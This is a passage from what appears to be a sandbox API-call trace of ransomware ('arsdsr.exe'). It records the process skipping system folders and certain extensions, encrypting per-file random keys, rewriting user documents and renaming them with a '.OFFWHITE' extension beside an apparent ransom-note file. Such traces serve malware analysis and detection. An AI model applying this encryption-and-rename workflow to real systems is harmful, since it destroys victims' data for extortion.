DKMbMx\\drzrlM01uFTKeBD_.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\drzrlm01uftkebd_.pptx.offwhite")) returned 1 [0133.012] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcb940, ftCreationTime.dwHighDateTime=0x1d5d904, ftLastAccessTime.dwLowDateTime=0x76882c70, ftLastAccessTime.dwHighDateTime=0x1d5dde6, ftLastWriteTime.dwLowDateTime=0x76882c70, ftLastWriteTime.dwHighDateTime=0x1d5dde6, nFileSizeHigh=0x0, nFileSizeLow=0x8a5, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName="GLys.odt", cAlternateFileName="")) returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2=".") returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="..") returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="...") returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="windows") returned -1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="$recycle.bin") returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="rsa") returned -1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="ntuser.dat") returned -1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="programdata") returned -1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="appdata") returned 1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="program files") returned -1 [0133.013] lstrcmpiW (lpString1="GLys.odt", lpString2="program files (x86)") returned -1 [0133.014] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" [0133.015] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\", lpString2="GLys.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt" [0133.015] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.015] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.015] PathFindExtensionW (pszPath="GLys.odt") returned=".odt" [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0133.015] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0133.016] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0133.016] lstrcmpiW (lpString1="GLys.odt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.016] GetProcessHeap () returned 0x500000 [0133.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f678 [0133.016] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\glys.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0133.021] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=2213) returned 1 [0133.021] GetProcessHeap () returned 0x500000 [0133.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.021] GetProcessHeap () returned 0x500000 [0133.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.022] GetProcessHeap () returned 0x500000 [0133.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.022] GetProcessHeap () returned 0x500000 [0133.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.022] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.022] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.022] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c910*=0x100) returned 1 [0133.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.022] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x100) returned 1 [0133.023] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x8a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.023] SetLastError (dwErrCode=0x0) [0133.023] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.026] GetLastError () returned 0x0 [0133.026] GetLastError () returned 0x0 [0133.026] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x9a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.026] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.026] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xaa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.026] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f678*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f678*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0133.026] GetProcessHeap () returned 0x500000 [0133.026] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8a5) returned 0x526640 [0133.027] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.027] ReadFile (in: hFile=0x1e4, lpBuffer=0x526640, nNumberOfBytesToRead=0x8a5, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesRead=0x295cb40*=0x8a5, lpOverlapped=0x0) returned 1 [0133.027] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.027] WriteFile (in: hFile=0x1e4, lpBuffer=0x526640*, nNumberOfBytesToWrite=0x8a5, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesWritten=0x295cb4c*=0x8a5, lpOverlapped=0x0) returned 1 [0133.027] GetProcessHeap () returned 0x500000 [0133.027] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x526640 | out: hHeap=0x500000) returned 1 [0133.027] CloseHandle (hObject=0x1e4) returned 1 [0133.035] GetProcessHeap () returned 0x500000 [0133.035] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.035] GetProcessHeap () returned 0x500000 [0133.035] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.035] GetProcessHeap () returned 0x500000 [0133.035] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.035] GetProcessHeap () returned 0x500000 [0133.035] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.035] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt" [0133.036] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt.OFFWHITE" [0133.036] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\glys.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\GLys.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\glys.odt.offwhite")) returned 1 [0133.036] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcb940, ftCreationTime.dwHighDateTime=0x1d5d904, ftLastAccessTime.dwLowDateTime=0x76882c70, ftLastAccessTime.dwHighDateTime=0x1d5dde6, ftLastWriteTime.dwLowDateTime=0x76882c70, ftLastWriteTime.dwHighDateTime=0x1d5dde6, nFileSizeHigh=0x0, nFileSizeLow=0x8a5, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName="GLys.odt", cAlternateFileName="")) returned 0 [0133.036] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0133.037] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e38d30, ftCreationTime.dwHighDateTime=0x1d5dd07, ftLastAccessTime.dwLowDateTime=0xa6e91460, ftLastAccessTime.dwHighDateTime=0x1d5d8b9, ftLastWriteTime.dwLowDateTime=0xa6e91460, ftLastWriteTime.dwHighDateTime=0x1d5d8b9, nFileSizeHigh=0x0, nFileSizeLow=0x119dc, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="2OIOMddl.xlsx", cAlternateFileName="2OIOMD~1.XLS")) returned 1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2=".") returned 1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="..") returned 1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="...") returned 1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="windows") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="$recycle.bin") returned 1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="rsa") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="ntuser.dat") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="programdata") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="appdata") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="program files") returned -1 [0133.037] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="program files (x86)") returned -1 [0133.037] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0133.037] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="2OIOMddl.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx" [0133.037] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.037] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.037] PathFindExtensionW (pszPath="2OIOMddl.xlsx") returned=".xlsx" [0133.037] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0133.037] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0133.037] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0133.037] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0133.037] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0133.038] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0133.038] lstrcmpiW (lpString1="2OIOMddl.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.038] GetProcessHeap () returned 0x500000 [0133.038] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f688 [0133.038] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\2oiomddl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0133.041] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=72156) returned 1 [0133.041] GetProcessHeap () returned 0x500000 [0133.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.041] GetProcessHeap () returned 0x500000 [0133.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.041] GetProcessHeap () returned 0x500000 [0133.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.041] GetProcessHeap () returned 0x500000 [0133.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.041] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.042] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.042] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0133.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.042] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0133.042] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x119dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.042] SetLastError (dwErrCode=0x0) [0133.042] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.046] GetLastError () returned 0x0 [0133.046] GetLastError () returned 0x0 [0133.046] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x11adc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.046] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.046] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x11bdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.046] WriteFile (in: hFile=0x218, lpBuffer=0x53f688*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x53f688*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0133.046] GetProcessHeap () returned 0x500000 [0133.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x119dc) returned 0x55c7c8 [0133.047] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.047] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x119dc, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x119dc, lpOverlapped=0x0) returned 1 [0133.052] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.052] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x119dc, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x119dc, lpOverlapped=0x0) returned 1 [0133.052] GetProcessHeap () returned 0x500000 [0133.052] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0133.052] CloseHandle (hObject=0x218) returned 1 [0133.058] GetProcessHeap () returned 0x500000 [0133.058] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.058] GetProcessHeap () returned 0x500000 [0133.058] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.058] GetProcessHeap () returned 0x500000 [0133.058] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.058] GetProcessHeap () returned 0x500000 [0133.058] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.058] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx" [0133.058] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx.OFFWHITE" [0133.058] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\2oiomddl.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\2OIOMddl.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\2oiomddl.xlsx.offwhite")) returned 1 [0133.059] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc23eb230, ftCreationTime.dwHighDateTime=0x1d5dec5, ftLastAccessTime.dwLowDateTime=0x202d9920, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x202d9920, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="aZ8e0Ld0z", cAlternateFileName="AZ8E0L~1")) returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2=".") returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="..") returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="...") returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="windows") returned -1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="$recycle.bin") returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="rsa") returned -1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="ntuser.dat") returned -1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="programdata") returned -1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="appdata") returned 1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="program files") returned -1 [0133.059] lstrcmpiW (lpString1="aZ8e0Ld0z", lpString2="program files (x86)") returned -1 [0133.059] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0133.059] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="aZ8e0Ld0z" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z" [0133.059] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS 